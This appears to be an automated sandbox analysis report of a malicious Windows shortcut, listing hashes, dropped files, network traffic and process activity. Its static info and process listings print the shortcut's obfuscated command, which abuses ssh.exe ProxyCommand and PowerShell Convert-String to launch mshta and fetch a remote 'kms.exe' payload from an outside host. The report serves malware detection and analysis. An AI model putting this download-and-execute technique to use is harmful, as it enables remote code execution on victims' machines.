                      SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrBv:KooCEYhgYEL0In5
                      MD5:D15CF6BB5E911D4FD6DA5A462D70CCFA
                      SHA1:6FF539172CE58599601B10B0C50337142199BACE
                      SHA-256:0513A80DABC5B389DAC86E732C6B8F6B3ED0F159456D508E11DD19A1AB35EDB4
                      SHA-512:0047C0C66713B2A7D7D5F358D7BF9D7B068969D75256AB60C9E43D16767304795B515B1464E337CE78590F411C0D20191C5DE9C8C25ADC213FD311AA15CBEDB9
                      Malicious:false
                      Reputation:low
                      Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                      Download File
                      Process:C:\Windows\System32\svchost.exe
                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x34e7b6ce, page size 16384, DirtyShutdown, Windows version 10.0
                      Category:dropped
                      Size (bytes):1310720
                      Entropy (8bit):0.4221504383894479
                      Encrypted:false
                      SSDEEP:1536:xSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:xaza/vMUM2Uvz7DO
                      MD5:4FA35CE2A68E72592122139D7443E251
                      SHA1:FA1F115B85F817E9D6DADFEE39B8C82288A6804C
                      SHA-256:27287A6AB3D43DFE31237F10A1EBF389F9A42954BB9EFA6EBCC61C634DEAA881
                      SHA-512:AB5E074D4093721D75D397016F63A47694341929A8773FF50206156B6B6EE83A9CDBC7DE98F9EDA218F66172661A5195A0EBBE21F06D3CF631C708971E6F488A
                      Malicious:false
                      Reputation:low
                      Preview:4..... .......A.......X\...;...{......................0.!..........{A.. ...}..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{....................................-.. ...}O...................... ...}/..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                      Download File
                      Process:C:\Windows\System32\svchost.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):16384
                      Entropy (8bit):0.07603439823457468
                      Encrypted:false
                      SSDEEP:3:w1tyYeJL7ajn13a/F61c8XlallcVO/lnlZMxZNQl:wHyzJHa53qF6i8AOewk
                      MD5:1CBFFEF4911DBBA41747BEB76D3A5DCE
                      SHA1:791EBF0374030D26248148C1D722714E74FA623E
                      SHA-256:9CB66238CDC1376F0543C1790EE865A3C61208DBD3C74EFC13A42605ADC0E0C3
                      SHA-512:1C843E86239F1DC4F6616116E0DC68030E9E49A59DFE2B680D7D28CB6B706865801D9B1DD30933C7893A7260A51FB318259D45609DE50F5AB8BF6AA3C2F2CFCE
                      Malicious:false
                      Reputation:low
                      Preview:.........................................;...{... ...}/......{A..............{A......{A..........{A]..................... ...}/.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):1516
                      Entropy (8bit):5.518449166900884
                      Encrypted:false
                      SSDEEP:24:3hZNVsSKco4KmBs4RPT6BmFoUe7uomjKcm9qr9t7J0gt/NKrqIY9r6Ligmvn:vsSU4y4RQmFoUeComfm9qr9tK8NIqIYh
                      MD5:2D8BCE3CEBDA9EC3621EE039107A022C
                      SHA1:8EF4B1DC40A88B4E5BD45952602FAFF9061904E5
                      SHA-256:ED856F1E3E75120C3232E1E90CEE529AA528D140C23F1E2A7A10A688FCA989F1
                      SHA-512:9150ACBDA02AEEAA3CEDC07B424D893A9708E0453051A8714A59483BC879974E25FFC41EDB7D31EBBB2569BE9A8CA497FF6107BC54F21078103EF40187FFBE82
                      Malicious:false
                      Reputation:low
                      Preview:@...e................................................@..........8...............N8Y U..J.Zw#.3.&........SMDiagnostics...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D.......

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_11i41yxv.fx0.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_anlieu0o.b4e.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g4ljzysm.d0n.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u5pe1ccr.giz.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                      Download File
                      Process:C:\Windows\System32\svchost.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):55
                      Entropy (8bit):4.306461250274409
                      Encrypted:false
                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                      Malicious:false
                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                      Static File Info

                      General

                      File type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                      Entropy (8bit):2.63270230254797
                      TrID:
                      • Windows Shortcut (20020/1) 100.00%
                      File name:test.lnk.download.lnk
                      File size:2'428 bytes
                      MD5:18983de56bb363009528a125b8f4145f
                      SHA1:2b75d485f28365a6f669046637aedaaa47341f92
                      SHA256:8f54dfa771cd17aab3b5d53c82f92e35a30190b44a64ac86b5739758a1640ee7
                      SHA512:ae8468f0b26ac6b333b702c2e336f1261da8a7fc549c4cd0704af69cd4e58132c060bc19dd86d2bbeb8286629edc59e37271b9f58071c7b29d954cbf7c6845ae
                      SSDEEP:24:8Ayj/BF//Z/U9p+/+GUWb4zraIxdd79dsHgPf+:8ZLZwRGUa8FdJ9x
                      TLSH:844124042EEA0325F3B38A7558BAAB20C53BBC46DDB19E1D008D42881377614E4B5FBB
                      File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

                      File Icon

                      Icon Hash:929e9e96a3f3d6ed

                      Static Windows Shortcut Info

                      General

                      Relative Path:..\..\..\Windows\System32\OpenSSH\ssh.exe
                      Command Line Argument: -o ProxyCommand="powershell powershell (Convert-String -E '1 2 3 4 5 6=23 1//5/4/6' -I 'https: ms hta temp book.rollingvideogames.com kms.exe')" .
                      Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2025-03-13T17:32:31.106022+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.44971823.235.202.121443TCP

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Mar 13, 2025 17:32:29.066728115 CET49718443192.168.2.423.235.202.121
                      Mar 13, 2025 17:32:29.066816092 CET4434971823.235.202.121192.168.2.4
                      Mar 13, 2025 17:32:29.066884995 CET49718443192.168.2.423.235.202.121
                      Mar 13, 2025 17:32:29.082022905 CET49718443192.168.2.423.235.202.121
                      Mar 13, 2025 17:32:29.082053900 CET4434971823.235.202.121192.168.2.4
                      Mar 13, 2025 17:32:30.511673927 CET4434971823.235.202.121192.168.2.4
                      Mar 13, 2025 17:32:30.511743069 CET49718443192.168.2.423.235.202.121
                      Mar 13, 2025 17:32:30.571516991 CET49718443192.168.2.423.235.202.121
                      Mar 13, 2025 17:32:30.571558952 CET4434971823.235.202.121192.168.2.4
                      Mar 13, 2025 17:32:30.571949005 CET4434971823.235.202.121192.168.2.4
                      Mar 13, 2025 17:32:30.572001934 CET49718443192.168.2.423.235.202.121
                      Mar 13, 2025 17:32:30.574625969 CET49718443192.168.2.423.235.202.121
                      Mar 13, 2025 17:32:30.616326094 CET4434971823.235.202.121192.168.2.4
                      Mar 13, 2025 17:32:31.106031895 CET4434971823.235.202.121192.168.2.4
                      Mar 13, 2025 17:32:31.106097937 CET49718443192.168.2.423.235.202.121
                      Mar 13, 2025 17:32:31.106123924 CET4434971823.235.202.121192.168.2.4
                      Mar 13, 2025 17:32:31.106173992 CET49718443192.168.2.423.235.202.121
                      Mar 13, 2025 17:32:31.108654022 CET49718443192.168.2.423.235.202.121
                      Mar 13, 2025 17:32:31.108707905 CET4434971823.235.202.121192.168.2.4
                      Mar 13, 2025 17:32:31.108793974 CET49718443192.168.2.423.235.202.121

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Mar 13, 2025 17:32:29.044954062 CET5617853192.168.2.41.1.1.1
                      Mar 13, 2025 17:32:29.059190989 CET53561781.1.1.1192.168.2.4

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Mar 13, 2025 17:32:29.044954062 CET192.168.2.41.1.1.10x1ec7Standard query (0)book.rollingvideogames.comA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Mar 13, 2025 17:32:29.059190989 CET1.1.1.1192.168.2.40x1ec7No error (0)book.rollingvideogames.com23.235.202.121A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • book.rollingvideogames.com

                      HTTPS Proxied Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.44971823.235.202.1214437300C:\Windows\System32\mshta.exe
                      TimestampBytes transferredDirectionData
                      2025-03-13 16:32:30 UTC342OUTGET /temp/kms.exe HTTP/1.1
                      Accept: */*
                      Accept-Language: en-CH
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                      Host: book.rollingvideogames.com
                      Connection: Keep-Alive
                      2025-03-13 16:32:31 UTC176INHTTP/1.1 500 Internal Server Error
                      Date: Thu, 13 Mar 2025 16:32:30 GMT
                      Server: Apache
                      Content-Length: 289
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      2025-03-13 16:32:31 UTC289INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 35 30 30 20 2d 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 45 72 72 6f 72 20 35 30 30 20 2d 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 70 3e 41 6e 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 20 54 79 70 69 63 61 6c 6c 79 20 74 68 69 73 20 69 73 20 61 20 74 65 6d 70 6f 72 61 72 79 20 63 6f 6e 64 69 74 69 6f 6e 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 77 65 62 20 73 69 74 65 20 6f 77 6e 65 72 20 66 6f 72 20 66 75 72
                      Data Ascii: <html><head><title>Error 500 - Internal Server Error</title><head><body><h1>Error 500 - Internal Server Error</h1><p>An error was encountered while processing your request. Typically this is a temporary condition. Please contact the web site owner for fur


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:12:32:23
                      Start date:13/03/2025
                      Path:C:\Windows\System32\OpenSSH\ssh.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell (Convert-String -E '1 2 3 4 5 6=23 1//5/4/6' -I 'https: ms hta temp book.rollingvideogames.com kms.exe')" .
                      Imagebase:0x7ff6f5cb0000
                      File size:946'176 bytes
                      MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:false

                      General

                      Target ID:1
                      Start time:12:32:23
                      Start date:13/03/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff62fc20000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      General

                      Target ID:2
                      Start time:12:32:23
                      Start date:13/03/2025
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:powershell powershell (Convert-String -E '1 2 3 4 5 6=23 1//5/4/6' -I 'https: ms hta temp book.rollingvideogames.com kms.exe')
                      Imagebase:0x7ff7016f0000
                      File size:452'608 bytes
                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:3
                      Start time:12:32:26
                      Start date:13/03/2025
                      Path:C:\Windows\System32\svchost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Imagebase:0x7ff6ca680000
                      File size:55'320 bytes
                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      General

                      Target ID:4
                      Start time:12:32:27
                      Start date:13/03/2025
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "mshta https://book.rollingvideogames.com/temp/kms.exe"
                      Imagebase:0x7ff7016f0000
                      File size:452'608 bytes
                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:5
                      Start time:12:32:27
                      Start date:13/03/2025
                      Path:C:\Windows\System32\mshta.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\system32\mshta.exe" https://book.rollingvideogames.com/temp/kms.exe
                      Imagebase:0x7ff7680a0000
                      File size:14'848 bytes
                      MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:false

                      Disassembly

                      Reset < >

                        Executed Functions

                        Function 00007FFC3DE733B5 Relevance: .0, Instructions: 49COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000004.00000002.1218019138.00007FFC3DE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_7ffc3de70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                        • Instruction ID: 8630c25967069faad460f61fe968e28c6f721b1b1b9a98669948ab78a9f2eb7f
                        • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                        • Instruction Fuzzy Hash: 7901A73010CB0C4FD784EF0CE051AA5B7E0FB85364F10052DE58AC36A1DA36E882CB41